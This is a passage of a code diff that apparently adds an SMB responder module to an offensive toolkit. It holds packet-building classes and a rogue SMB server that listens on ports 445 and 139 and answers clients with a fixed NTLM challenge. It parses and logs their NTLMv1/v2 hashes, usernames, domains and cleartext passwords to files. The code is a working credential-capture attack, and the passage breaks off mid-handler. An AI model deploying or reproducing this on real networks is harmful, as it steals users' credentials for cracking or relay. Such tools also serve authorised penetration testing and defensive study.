+        ("Tag0ASNId",             "\xA0"),
+        ("Tag0ASNIdLen",          "\x03"),
+        ("NegoStateASNId",        "\x0A"),
+        ("NegoStateASNLen",       "\x01"),
+        ("NegoStateASNValue",     "\x01"),
+        ("Tag1ASNId",             "\xA1"),
+        ("Tag1ASNIdLen",          "\x0c"),
+        ("Tag1ASNId2",            "\x06"),
+        ("Tag1ASNId2Len",         "\x0A"),
+        ("Tag1ASNId2Str",         "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
+        ("Tag2ASNId",             "\xA2"),
+        ("Tag2ASNIdLenOfLen",     "\x81"),
+        ("Tag2ASNIdLen",          "\xED"),
+        ("Tag3ASNId",             "\x04"),
+        ("Tag3ASNIdLenOfLen",     "\x81"),
+        ("Tag3ASNIdLen",          "\xEA"),
+        ("NTLMSSPSignature",      "NTLMSSP"),
+        ("NTLMSSPSignatureNull",  "\x00"),
+        ("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
+        ("NTLMSSPNtWorkstationLen","\x1e\x00"),
+        ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
+        ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
+        ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+        ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
+        ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("NTLMSSPNtTargetInfoLen","\x94\x00"),
+        ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
+        ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
+        ("NegTokenInitSeqMechMessageVersionHigh","\x05"),
+        ("NegTokenInitSeqMechMessageVersionLow","\x02"),
+        ("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
+        ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
+        ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
+        ("NTLMSSPNtWorkstationName","SMB12"),
+        ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
+        ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
+        ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","smb12"),
+        ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SERVER2008"), 
+        ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","smb12.local"), 
+        ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SERVER2008.smb12.local"),
+        ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","smb12.local"),
+        ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
+        ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
+        ("NTLMSSPNTLMPadding",             ""),
+        ("NativeOs","Windows Server 2003 3790 Service Pack 2"),                           
+        ("NativeOsTerminator","\x00\x00"),
+        ("NativeLAN", "Windows Server 2003 5.2"),
+        ("NativeLANTerminator","\x00\x00"),
+    ])
+
+
+    def calculate(self):
+
+        ##Convert strings to Unicode first...
+        self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
+        self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
+        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
+        self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
+
+        ###### SecBlobLen Calc:
+        AsnLen= str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
+
+        CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
+
+        ##### Bcc len
+        BccLen = AsnLen+CalculateSecBlob+str(self.fields["NTLMSSPNTLMPadding"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
+        #SecBlobLen
+        self.fields["SecBlobLen"] = struct.pack("<h", len(AsnLen+CalculateSecBlob))
+        self.fields["Bcc"] = struct.pack("<h", len(BccLen))
+        self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
+        self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6)
+        self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
+        self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
+        self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])))
+        self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
+
+        ###### Andxoffset calculation.
+        CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen
+
+        self.fields["Andxoffset"] = struct.pack("<h", len(CalculateCompletePacket)+32)
+        ###### Workstation Offset
+        CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
+
+        ###### AvPairs Offset
+        CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
+
+        ##### Workstation Offset Calculation:
+        self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
+        self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
+        self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
+
+        ##### IvPairs Offset Calculation:
+        self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
+        self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
+        self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
+        ##### IvPair Calculation:
+        self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
+        self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
+
+##################################################################################
+
+class SMBSession2Accept(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x04"),
+        ("AndXCommand",           "\xff"),
+        ("Reserved",              "\x00"),
+        ("Andxoffset",            "\xb4\x00"),
+        ("Action",                "\x00\x00"),
+        ("SecBlobLen",            "\x09\x00"),
+        ("Bcc",                   "\x89\x01"),
+        ("SSPIAccept","\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00"),
+        ("NativeOs","Windows Server 2003 3790 Service Pack 2"),                           
+        ("NativeOsTerminator","\x00\x00"),
+        ("NativeLAN", "Windows Server 2003 5.2"),
+        ("NativeLANTerminator","\x00\x00"),
+    ])
+    def calculate(self):
+        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
+        self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
+        BccLen = str(self.fields["SSPIAccept"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
+        self.fields["Bcc"] = struct.pack("<h", len(BccLen))
+
+class SMBSessEmpty(Packet):
+    fields = OrderedDict([
+        ("Empty",       "\x00\x00\x00"),
+    ])
+
+class SMBTreeData(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x07"),
+        ("AndXCommand", "\xff"),
+        ("Reserved","\x00" ),
+        ("Andxoffset", "\xbd\x00"),
+        ("OptionalSupport","\x00\x00"),
+        ("MaxShareAccessRight","\x00\x00\x00\x00"),
+        ("GuestShareAccessRight","\x00\x00\x00\x00"),
+        ("Bcc", "\x94\x00"),
+        ("Service", "IPC"),
+        ("ServiceTerminator","\x00\x00\x00\x00"),                           
+    ])
+
+
+    def calculate(self):
+        #Complete Packet Len
+        CompletePacket= str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["OptionalSupport"])+str(self.fields["MaxShareAccessRight"])+str(self.fields["GuestShareAccessRight"])+str(self.fields["Bcc"])+str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
+        ## AndXOffset
+        self.fields["Andxoffset"] = struct.pack("<H", len(CompletePacket)+32)
+        ## BCC Len Calc
+        BccLen= str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
+        self.fields["Bcc"] = struct.pack("<H", len(BccLen))
+
+# SMB Session/Tree Answer.
+class SMBSessTreeAns(Packet):
+    fields = OrderedDict([
+        ("Wordcount",       "\x03"),
+        ("Command",         "\x75"), 
+        ("Reserved",        "\x00"),
+        ("AndXoffset",      "\x4e\x00"),
+        ("Action",          "\x01\x00"),
+        ("Bcc",             "\x25\x00"),
+        ("NativeOs",        "Windows 5.1"),
+        ("NativeOsNull",    "\x00"),
+        ("NativeLan",       "Windows 2000 LAN Manager"),
+        ("NativeLanNull",   "\x00"),
+        ("WordcountTree",   "\x03"),
+        ("AndXCommand",     "\xff"),
+        ("Reserved1",       "\x00"),
+        ("AndxOffset",      "\x00\x00"),
+        ("OptionalSupport", "\x01\x00"),
+        ("Bcc2",            "\x08\x00"),
+        ("Service",         "A:"),
+        ("ServiceNull",     "\x00"),
+        ("FileSystem",      "NTFS"),
+        ("FileSystemNull",  "\x00"),
+
+    ])
+
+    def calculate(self):
+        ##AndxOffset
+        CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
+        self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]
+        ##BCC 1 and 2
+        CompleteBCCLen =  str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
+        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
+        CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
+        self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))

core/protocols/smb/SMBServer_Responder.py

@@ -0,0 +1,340 @@
+##################################################################################
+#SMB stuff starts here
+##################################################################################
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+def serve_thread_tcp(host, port, handler):
+	try:
+		server = ThreadingTCPServer((host, port), handler)
+		server.serve_forever()
+	except Exception, e:
+		print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+#Function name self-explanatory
+def Is_SMB_On(SMB_On_Off):
+
+	if SMB_On_Off == "ON":
+		if LM_On_Off == True:
+			t1  = threading.Thread(name="SMB1LM-445", target=self.serve_thread_tcp, args=("0.0.0.0", 445, SMB1LM))
+			t2 = threading.Thread(name="SMB1LM-139", target=self.serve_thread_tcp, args=("0.0.0.0", 139, SMB1LM))
+			for t in [t1, t2]:
+				t.setDaemon(True)
+				t.start()
+
+			return t1, t2
+
+		else:
+			t1 = threading.Thread(name="SMB1-445", target=serve_thread_tcp, args=("0.0.0.0", 445, SMB1))
+			t2 = threading.Thread(name="SMB1-139", target=serve_thread_tcp, args=("0.0.0.0", 139, SMB1))
+
+			for t in [t1,t2]:
+				t.setDaemon(True)
+				t.start()
+
+			return t1, t2
+
+	if SMB_On_Off == "OFF":
+		return False
+
+#Detect if SMB auth was Anonymous
+def Is_Anonymous(data):
+	SecBlobLen = struct.unpack('<H',data[51:53])[0]
+	if SecBlobLen < 260:
+		SSPIStart = data[75:]
+		LMhashLen = struct.unpack('<H',data[89:91])[0]
+		if LMhashLen == 0 or LMhashLen == 1:
+			return True
+		else:
+			return False
+	if SecBlobLen > 260:
+		SSPIStart = data[79:]
+		LMhashLen = struct.unpack('<H',data[93:95])[0]
+		if LMhashLen == 0 or LMhashLen == 1:
+			return True
+		else:
+			return False
+
+def Is_LMNT_Anonymous(data):
+	LMhashLen = struct.unpack('<H',data[51:53])[0]
+	if LMhashLen == 0 or LMhashLen == 1:
+		return True
+	else:
+		return False
+
+#Function used to know which dialect number to return for NT LM 0.12
+def Parse_Nego_Dialect(data):
+	DialectStart = data[40:]
+	pack = tuple(DialectStart.split('\x02'))[:10]
+	var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
+	test = tuple(var)
+	if test[0] == "NT LM 0.12":
+		return "\x00\x00"
+	if test[1] == "NT LM 0.12":
+		return "\x01\x00"
+	if test[2] == "NT LM 0.12":
+		return "\x02\x00"
+	if test[3] == "NT LM 0.12":
+		return "\x03\x00"
+	if test[4] == "NT LM 0.12":
+		return "\x04\x00"
+	if test[5] == "NT LM 0.12":
+		return "\x05\x00"
+	if test[6] == "NT LM 0.12":
+		return "\x06\x00"
+	if test[7] == "NT LM 0.12":
+		return "\x07\x00"
+	if test[8] == "NT LM 0.12":
+		return "\x08\x00"
+	if test[9] == "NT LM 0.12":
+		return "\x09\x00"
+	if test[10] == "NT LM 0.12":
+		return "\x0a\x00"
+
+def ParseShare(data):
+	packet = data[:]
+	a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
+	if a:
+		quote = "Share requested: "+a.group(0)
+		responder_logger.info(quote.replace('\x00',''))
+
+#Parse SMB NTLMSSP v1/v2
+def ParseSMBHash(data,client):
+	SecBlobLen = struct.unpack('<H',data[51:53])[0]
+	BccLen = struct.unpack('<H',data[61:63])[0]
+	if SecBlobLen < 260:
+		SSPIStart = data[75:]
+		LMhashLen = struct.unpack('<H',data[89:91])[0]
+		LMhashOffset = struct.unpack('<H',data[91:93])[0]
+		LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+		NthashLen = struct.unpack('<H',data[97:99])[0]
+		NthashOffset = struct.unpack('<H',data[99:101])[0]
+
+	if SecBlobLen > 260:
+		SSPIStart = data[79:]
+		LMhashLen = struct.unpack('<H',data[93:95])[0]
+		LMhashOffset = struct.unpack('<H',data[95:97])[0]
+		LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+		NthashLen = struct.unpack('<H',data[101:103])[0]
+		NthashOffset = struct.unpack('<H',data[103:105])[0]
+
+	if NthashLen == 24:
+		NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		DomainLen = struct.unpack('<H',data[105:107])[0]
+		DomainOffset = struct.unpack('<H',data[107:109])[0]
+		Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[113:115])[0]
+		UserOffset = struct.unpack('<H',data[115:117])[0]
+		User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+		writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
+		outfile = "./logs/responder/SMB-NTLMv1ESS-Client-"+client+".txt"
+		WriteData(outfile,writehash,User+"::"+Domain)
+		responder_logger.info('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
+
+	if NthashLen > 60:
+		outfile = "./logs/responder/SMB-NTLMv2-Client-"+client+".txt"
+		NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		DomainLen = struct.unpack('<H',data[109:111])[0]
+		DomainOffset = struct.unpack('<H',data[111:113])[0]
+		Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[117:119])[0]
+		UserOffset = struct.unpack('<H',data[119:121])[0]
+		User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+		writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:]
+		WriteData(outfile,writehash,User+"::"+Domain)
+		responder_logger.info('[+]SMB-NTLMv2 complete hash is :%s'%(writehash))
+
+#Parse SMB NTLMv1/v2
+def ParseLMNTHash(data,client):
+	try:
+		lenght = struct.unpack('<H',data[43:45])[0]
+		LMhashLen = struct.unpack('<H',data[51:53])[0]
+		NthashLen = struct.unpack('<H',data[53:55])[0]
+		Bcc = struct.unpack('<H',data[63:65])[0]
+		if NthashLen > 25:
+			Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
+			responder_logger.info('[+]SMB-NTLMv2 hash captured from :%s'%(client))
+			outfile = "./logs/responder/SMB-NTLMv2-Client-"+client+".txt"
+			pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
+			var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
+			Username, Domain = tuple(var)
+			Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper()
+			ParseShare(data)
+			WriteData(outfile,Writehash, Username+"::"+Domain)
+			responder_logger.info('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash))
+		if NthashLen == 24:
+			responder_logger.info('[+]SMB-NTLMv1 hash captured from :%s'%(client))
+			outfile = "./logs/responder/SMB-NTLMv1-Client-"+client+".txt"
+			pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
+			var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
+			Username, Domain = tuple(var)
+			writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal
+			ParseShare(data)
+			WriteData(outfile,writehash, Username+"::"+Domain)
+			responder_logger.info('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
+			responder_logger.info('[+]SMB-NTLMv1 Username:%s'%(Username))
+			responder_logger.info('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain))
+	except Exception:
+		raise
+
+def IsNT4ClearTxt(data):
+	HeadLen = 36
+	Flag2 = data[14:16]
+	if Flag2 == "\x03\x80":
+		SmbData = data[HeadLen+14:]
+		WordCount = data[HeadLen]
+		ChainedCmdOffset = data[HeadLen+1]
+		if ChainedCmdOffset == "\x75":
+			PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
+			if PassLen > 2:
+				Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
+				User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
+				#print "[SMB]Clear Text Credentials: %s:%s" %(User,Password)
+				responder_logger.info("[SMB]Clear Text Credentials: %s:%s"%(User,Password))
+
+#SMB Server class, NTLMSSP
+class SMB1(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				data = self.request.recv(1024)
+				self.request.settimeout(1)
+				##session request 139
+				if data[0] == "\x81":
+					buffer0 = "\x82\x00\x00\x00"
+					self.request.send(buffer0)
+					data = self.request.recv(1024)
+				##Negotiate proto answer.
+				if data[8:10] == "\x72\x00":
+					#Customize SMB answer.
+					head = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
+					t = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
+					t.calculate()
+					final = t
+					packet0 = str(head)+str(final)
+					buffer0 = longueur(packet0)+packet0
+					self.request.send(buffer0)
+					data = self.request.recv(1024)
+					##Session Setup AndX Request
+				if data[8:10] == "\x73\x00":
+					IsNT4ClearTxt(data)
+					head = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
+					t = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge)
+					t.calculate()
+					final = t
+					packet1 = str(head)+str(final)
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(4096)
+					if data[8:10] == "\x73\x00":
+						if Is_Anonymous(data):
+							head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+							final = SMBSessEmpty()
+							packet1 = str(head)+str(final)
+							buffer1 = longueur(packet1)+packet1
+							self.request.send(buffer1)
+						else:
+							ParseSMBHash(data,self.client_address[0])
+							head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+							final = SMBSession2Accept()
+							final.calculate()
+							packet2 = str(head)+str(final)
+							buffer2 = longueur(packet2)+packet2
+							self.request.send(buffer2)
+							data = self.request.recv(1024)
+				##Tree Connect IPC Answer
+				if data[8:10] == "\x75\x00":
+					ParseShare(data)
+					head = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
+					t = SMBTreeData()
+					t.calculate()
+					final = t
+					packet1 = str(head)+str(final)
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(1024)
+				##Tree Disconnect.
+				if data[8:10] == "\x71\x00":
+					head = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					final = "\x00\x00\x00"
+					packet1 = str(head)+str(final)
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(1024)
+				##NT_CREATE Access Denied.
+				if data[8:10] == "\xa2\x00":
+					head = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					final = "\x00\x00\x00"
+					packet1 = str(head)+str(final)
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(1024)
+				##Trans2 Access Denied.
+				if data[8:10] == "\x25\x00":
